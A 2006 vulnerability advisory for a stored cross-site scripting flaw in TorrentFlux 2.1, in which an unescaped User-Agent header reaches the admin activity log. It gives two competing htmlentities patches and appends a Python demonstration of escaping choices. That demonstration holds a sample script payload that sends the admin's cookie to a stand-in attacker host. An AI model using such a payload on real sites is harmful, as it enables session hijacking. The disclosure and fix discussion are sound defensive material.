TorrentFlux User-Agent XSS Vulnerability
Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)
I gave the authors of this product a week (more than usual) just to contact me; they have failed to do so, so I am releasing this vulnerability publicly!
/admin.php
Line: 325
$ip_info = $ip_resolved."
".$user_agent;
The user agent is not escaped before it is concatenated into the page.
Solution:
Edit source code:
/admin.php
Line 325:
$ip_info = htmlentities($ip_resolved, ENT_QUOTES)."
".htmlentities($user_agent, ENT_QUOTES);
Luis said,
October 10, 2006 @ 2:35 pm
Thanks, I do not understand the vulnerability but I adopted your solution.
Steven Roddis said,
October 10, 2006 @ 4:13 pm
In a nutshell, if an attacker spoofs his user-agent (extremely easy) and you visit your activity logs, he/she can "steal" your session cookie and log in as you... What he/she does then is up to them!
Chrome said,
October 17, 2006 @ 3:58 am
The real fix for this is to edit the following in settingsfunctions.php:
Line 33:
[code] return htmlentities(trim($_REQUEST[$varName]), ENT_QUOTES);[/code]
Lines 51-59:
[code] $rec = array(
'user_id' => $cfg['user'],
'file' => $file,
'action' => $action,
'ip' => htmlentities($cfg['ip'], ENT_QUOTES),
'ip_resolved' => htmlentities($host_resolved, ENT_QUOTES),
'user_agent' => htmlentities($_SERVER['HTTP_USER_AGENT'], ENT_QUOTES),
'time' => $create_time
);[/code]
By doing this, all the request/get vars will be scrubbed as well as any logging of user-agents and IP addresses reported by the visitor.
We are planning a TF 2.1.1 release very soon.
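The two patches in this thread (Roddis escaping at output time in admin.php, Chrome escaping at log-write time in settingsfunctions.php) both close the same hole, and applying both at once double-encodes the stored text. The following is an added example written for this page in Python rather than the project's PHP; it is not TorrentFlux code and not code from either commenter. The headers, the User-Agent payload, the function names and the record layout are constructed for the demonstration; html.escape(quote=True) stands in for htmlentities($v, ENT_QUOTES).

```python
import html

# Constructed sample request headers. The User-Agent value is a generic
# stored-XSS probe written for this example; it is not taken from the
# advisory. Any HTTP client lets a visitor set this header freely.
SPOOFED_HEADERS = {
    "User-Agent": '<script>new Image().src="http://attacker.example/?c="'
                  '+document.cookie</script>',
}


def html_escape(value):
    """Stand-in for PHP htmlentities($value, ENT_QUOTES): escapes & < > "
    and ' so the value is inert both as element text and inside a quoted
    attribute."""
    return html.escape(value, quote=True)


def write_log_record(headers, ip_resolved, escape_on_write=False):
    """Build one activity-log record. Field names follow the snippet Chrome
    quotes from settingsfunctions.php; escape_on_write=True is Chrome's
    fix (scrub the header before it is stored)."""
    user_agent = headers.get("User-Agent", "")
    if escape_on_write:
        user_agent = html_escape(user_agent)
    return {"ip_resolved": ip_resolved, "user_agent": user_agent}


def render_ip_info_vulnerable(rec):
    """admin.php line 325 as reported: raw concatenation into page HTML."""
    return rec["ip_resolved"] + " " + rec["user_agent"]


def render_ip_info_fixed(rec):
    """Roddis's fix: escape each field at output time."""
    return html_escape(rec["ip_resolved"]) + " " + html_escape(rec["user_agent"])


def has_raw_markup(fragment):
    """True if the fragment still contains an unescaped angle bracket,
    i.e. a browser would parse part of it as a tag."""
    return "<" in fragment or ">" in fragment


if __name__ == "__main__":
    # 1. Unescaped storage + unescaped output: the script tag reaches the
    #    admin's browser when the activity log is viewed.
    raw = write_log_record(SPOOFED_HEADERS, "localhost")
    print(render_ip_info_vulnerable(raw))
    # 2. Escape on output only (the advisory's patch): tag is shown as text.
    print(render_ip_info_fixed(raw))
    # 3. Escape on write only (Chrome's patch): stored text is already inert.
    scrubbed = write_log_record(SPOOFED_HEADERS, "localhost", escape_on_write=True)
    print(render_ip_info_vulnerable(scrubbed))
    # 4. Both patches at once: double encoding, the admin sees a literal
    #    "&lt;script&gt;" instead of "<script>".
    print(render_ip_info_fixed(scrubbed))
```

Escaping at write time protects every page that later prints the record, but it also means the database holds HTML-encoded data, which breaks if the same field is ever emitted into a non-HTML context (a CSV export, a JSON API). Escaping at output time keeps the stored value faithful and is the usual recommendation, but every output path must remember to do it. Whichever layer is chosen, it should be exactly one; case 4 above shows the double-encoding artefact that results from applying both. ENT_QUOTES matters because PHP's default escapes double quotes but not single quotes, so a value landing inside a single-quoted attribute would still break out.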